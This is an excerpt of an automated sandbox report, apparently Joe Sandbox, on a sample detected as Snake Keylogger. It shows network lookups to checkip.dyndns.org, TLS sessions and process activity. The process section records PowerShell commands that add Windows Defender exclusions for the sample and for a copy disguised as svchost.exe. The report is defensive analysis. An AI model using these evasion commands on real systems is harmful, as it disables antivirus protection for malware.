                                                        Apr 8, 2021 11:03:33.433768988 CEST | 5158 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        38 | 192.168.2.3 | 49794 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:33.553150892 CEST | 5158 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:33.659982920 CEST | 5159 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        39 | 192.168.2.3 | 49796 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:34.491008043 CEST | 5165 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:34.597080946 CEST | 5165 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        4 | 192.168.2.3 | 49729 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:05.745573044 CEST | 4991 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:05.851958036 CEST | 4991 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        40 | 192.168.2.3 | 49799 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:34.765099049 CEST | 5177 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:34.871043921 CEST | 5181 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        41 | 192.168.2.3 | 49800 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:34.983300924 CEST | 5217 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.091293097 CEST | 5218 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        42 | 192.168.2.3 | 49801 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:35.199928999 CEST | 5218 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.306433916 CEST | 5219 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        43 | 192.168.2.3 | 49802 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:35.417623043 CEST | 5219 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.523013115 CEST | 5220 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        44 | 192.168.2.3 | 49803 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:35.631524086 CEST | 5220 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:35.737811089 CEST | 5221 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        5 | 192.168.2.3 | 49730 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:08.507339954 CEST | 4992 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:08.612941980 CEST | 4992 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        6 | 192.168.2.3 | 49731 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:09.783368111 CEST | 4992 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:09.888408899 CEST | 4993 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        7 | 192.168.2.3 | 49732 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:11.054966927 CEST | 4993 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:11.160370111 CEST | 4994 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        8 | 192.168.2.3 | 49733 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:11.827866077 CEST | 4995 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:11.934300900 CEST | 4996 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        9 | 192.168.2.3 | 49742 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:13.074529886 CEST | 5021 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:13.179763079 CEST | 5022 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Server: DynDNS-CheckIP/1.0.1
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Length: 104
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        HTTPS Packets

                                                        Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                                        Apr 8, 2021 11:01:44.910068989 CEST | 104.21.56.119 | 443 | 192.168.2.3 | 49701 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Wed Mar 31 02:00:00 CEST 2021 | Thu Mar 31 01:59:59 CEST 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
                                                            Chain (issuing CA): Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Not Before Mon Jan 27 13:48:08 CET 2020 | Not After Wed Jan 01 00:59:59 CET 2025
                                                        Apr 8, 2021 11:02:55.378983021 CEST | 172.67.188.154 | 443 | 192.168.2.3 | 49725 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Mon Aug 10 02:00:00 CEST 2020 | Tue Aug 10 14:00:00 CEST 2021 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
                                                            Chain (issuing CA): Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Not Before Mon Jan 27 13:48:08 CET 2020 | Not After Wed Jan 01 00:59:59 CET 2025
                                                        Apr 8, 2021 11:03:12.451477051 CEST | 172.67.188.154 | 443 | 192.168.2.3 | 49737 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Mon Aug 10 02:00:00 CEST 2020 | Tue Aug 10 14:00:00 CEST 2021 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
                                                            Chain (issuing CA): Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Not Before Mon Jan 27 13:48:08 CET 2020 | Not After Wed Jan 01 00:59:59 CET 2025
                                                        Apr 8, 2021 11:03:30.037919044 CEST | 172.67.188.154 | 443 | 192.168.2.3 | 49777 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Mon Aug 10 02:00:00 CEST 2020 | Tue Aug 10 14:00:00 CEST 2021 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
                                                            Chain (issuing CA): Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Not Before Mon Jan 27 13:48:08 CET 2020 | Not After Wed Jan 01 00:59:59 CET 2025

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        System Behavior

                                                        General

                                                        Start time: 11:01:42
                                                        Start date: 08/04/2021
                                                        Path: C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: 'C:\Users\user\Desktop\lfQuSBwdSf.exe'
                                                        Imagebase: 0xcb0000
                                                        File size: 46080 bytes
                                                        MD5 hash: 0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Reputation: low

                                                        General

                                                        Start time: 11:01:50
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                                                        Imagebase: 0x7ff7488e0000
                                                        File size: 51288 bytes
                                                        MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 11:01:55
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase: 0xb0000
                                                        File size: 430592 bytes
                                                        MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Reputation: high

                                                        General

                                                        Start time: 11:01:56
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase: 0x7ff6b2800000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 11:01:56
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
                                                        Imagebase: 0xb0000
                                                        File size: 430592 bytes
                                                        MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Reputation: high

                                                        General

                                                        Start time: 11:01:57
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase: 0x7ff6b2800000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 11:01:57
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                                                        Imagebase: 0xb0000
                                                        File size: 430592 bytes
                                                        MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Reputation: high

                                                        General

                                                        Start time: 11:01:57
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase: 0x7ff6b2800000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 11:02:03
                                                        Start date: 08/04/2021
                                                        Path: C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit): true
                                                        Commandline: 'C:\Windows\System32\cmd.exe' /c timeout 1
                                                        Imagebase: 0xbd0000
                                                        File size: 232960 bytes
                                                        MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time:11:02:03
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:11:02:04
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7488e0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:11:02:04
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:timeout 1
                                                        Imagebase:0xee0000
                                                        File size:26112 bytes
                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:11:02:11
                                                        Start date:08/04/2021
                                                        Path:C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe'
                                                        Imagebase:0xf50000
                                                        File size:46080 bytes
                                                        MD5 hash:0802967C1D72DEEB4E1B79AF74FDB553
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 29%, ReversingLabs
                                                        Reputation:low

                                                        General

